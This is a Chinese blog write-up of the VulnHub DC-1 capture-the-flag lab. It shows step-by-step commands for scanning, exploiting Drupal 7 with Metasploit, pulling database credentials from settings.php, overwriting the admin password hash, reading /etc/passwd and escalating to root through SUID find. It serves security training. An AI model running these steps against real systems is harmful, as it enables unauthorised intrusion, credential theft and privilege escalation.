vulnhub靶机:DC-1

最新推荐文章于 2024-10-19 21:07:48 发布
最新推荐文章于 2024-10-19 21:07:48 发布
阅读量661 收藏 6
点赞数 15
分类专栏: Vulnhub靶机 文章标签: web安全 网络安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/141231834
版权

目录

导入靶机

信息收集

发现IP

目录扫描

端口扫描

访问 web

漏洞利用

获得shell

连接数据库

修改管理员用户的密码

登录

提权

导入靶机

点击重试--》网卡改成 NAT模式--》开启靶机

信息收集

发现IP

arp-scan -l

发现靶机 IP 是 192.168.109.163

目录扫描

python3 dirsearch.py -u 192.168.109.163 -i 200

端口扫描

nmap -p- -A 192.168.109.163

发现开放了 22、80、111、45723 端口

访问 web

通过插件发现 CMS 是 Drupal 7

查看 robots.txt 文件无发现

查看Drupal 7 是否存在漏洞

发现存在 CMS 漏洞

漏洞利用

进入 msf 控制台

msfconsole

搜索对应模块

search drupal

使用模块

设置模块使用的对象,并且运行脚本,如图所示,成功连接

set rhosts 192.168.109.163
run

获得shell

获得shell 然后获得交互式 shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

查看当前目录发现在 www 下,进而发现了第 1 个 flag

Every good CMS needs a config file - and so do you.

去查看它的配置文件

在 sites/default/settings.php 文件中发现了第 2 个 flag,并得到了数据库的账户和密码

cd sites/default
cat settings.php

连接数据库

mysql -udbuser -p
R0ck3t

show databases;
use drupaldb;

show tables;

select * from users;

发现管理员用户,但是密码是加密的

修改管理员用户的密码

找到系统默认的加密scripts脚本,drupal默认hash加密脚本是在drupal7项目所在目录,所以是在网站的根目录下

find / -name scripts

php scripts/password-hash.sh 666

update drupaldb.users set pass="$S$DvsHxMU1J7auXAwRy2BO7YhiY/soyOoybzycnhI5fuNWYcccQuul" where name="admin";

修改成功

登录

翻找之后在 content 发现了第 3 个 flag

cat /etc/passwd

发现第 4 个 flag 在/home 里,然后找到了第 4 个 flag

cd /home/flag4
cat flag4.txt

提权

SUID-find提权

find / -perm -u=s -type f 2>/dev/null

有find文件,再次确认find文件的文件拥有者(属主)

ls -l /usr/bin/find

find命令直接提权

find / -exec '/bin/sh' \;

提权成功

燕雀安知鸿鹄之志哉.
关注
专栏目录
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2539
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 813
Vulnhub靶机:DC-1渗透详细过程
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4212
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 418
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 417
DC-1详解
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4591
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub靶机DC1
qq_48904485的博客
02-13 398
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC1(10.0.2.54)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/
vulnhub靶机实战DC-3
Varin
06-04 1001
vulnhub靶机实战DC-3
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1856
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3701
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 407
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1227
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
区块链技术在网络安全中的应用研究
最新发布
CWPIN21的博客
10-19 507
区块链是一种去中心化的分布式账本,它由一系列按照时间顺序连接的数据块组成。每个数据块包含了一定时间内的交易数据,这些数据块通过密码学算法链接在一起,形成一个不可篡改的链条。区块链的核心原理包括分布式账本、共识机制、密码学原理和智能合约。分布式账本确保数据在多个节点上进行存储和更新,避免了单点故障;共识机制保证了节点之间对数据的一致性认可;密码学原理用于保障数据的完整性和保密性;智能合约则实现了基于规则的自动执行操作。
软考(网工)——网络安全
2301_80093566的博客
10-18 653
公钥密码又称为非对称加密,就是对数据加密和解密的密钥是不同的。密钥分发方便、密钥保管量少、支持数字签名。加密速度慢(计算量大,不适合加密大数据)、数据膨胀率高。公钥公开,私钥自己保存。公钥加密,私钥解密,可实现保密通信私钥加密,公钥解密,可实现数字签名常见的非对称加密算法如下:RSA:512位(或1024位)密钥,计算量极大,难破解。Elgamal、ECC(椭圆曲线算法)、背包算法、Rabin、DH等。网络攻击分类:主动和被动。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-18 767
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
10-18 530
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值